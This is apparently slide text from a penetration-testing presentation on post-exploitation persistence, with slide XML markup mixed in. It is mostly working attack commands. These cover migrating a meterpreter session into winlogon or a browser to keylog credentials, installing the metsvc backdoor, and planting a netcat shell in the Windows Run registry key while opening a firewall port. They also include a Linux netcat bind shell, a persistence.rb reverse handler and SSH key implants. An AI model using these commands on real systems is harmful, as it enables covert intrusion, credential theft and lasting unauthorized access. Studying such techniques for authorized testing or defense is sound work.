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user@target.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Persistence: Post exploitation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andr01d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persistence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Migrate meterpreter session to other process’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meterpreter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Ps - lists processes on compromised computer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Migrate *process number*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Getpid - makes sure it migrated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Good for keylogging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Migrate to process you want logged, like winlogon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Captures login creds when they are entered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Migrate to browser.exe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Capture logins like firewall logins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Metasploit metsvc backdoor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Install via meterpreter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Migrate meterpreter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Run metsvc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reconnecting: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Use exploit/multi/handler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Set payload windows/metsvc_bind_tcp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Set LPORT 31337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Set RHOST *target*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Exploit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Should connect straight to backdoor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Netcat backdoor: loud but useful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 a Windows persistent nc backdoor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meterpreter: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Upload /pentest/windows-binaries/tools/nc.exe C:\\Windows\System32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Reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run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Reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d ‘C;\windows\system32\nc.exe -Ldpn 445 -e cmd.exe’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Reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc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Execute -f cmd -i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Netsh firewall show opmode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Netsh firewall add portopening TCP 445 “Service Firewall” ENABLE ALL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Netsh firewall show portopening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Now use netcat to connect to the target with port 445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 linux, a bit different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sure the target machine has netcat TRADITIONAL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Sudo update-alternatives --config nc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Select /bin/nc.traditional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Once you have that selected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On target machine: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Nc -lp 443 -e /bin/sh &amp;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On your machine:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1828800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Nc target.ip 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meterpreter persistence.rb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Once compromised with a meterpreter session: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Run persistence -h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Choose flags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Example run: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Run persistence -U -i 5 -p 443 -r target.ip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Reboot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metasploit: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exploit/multi/handler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payload windows/meterpreter/reverse_tcp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lhost target.ip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lport 443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exploit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your ssh keygen for easy access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 the server is running ssh, and you have access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 your computer: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>sh -keygen -t rsa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Enter file, password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Ssh-copy-id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>user@target.ip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Now enjoy ssh without passwords!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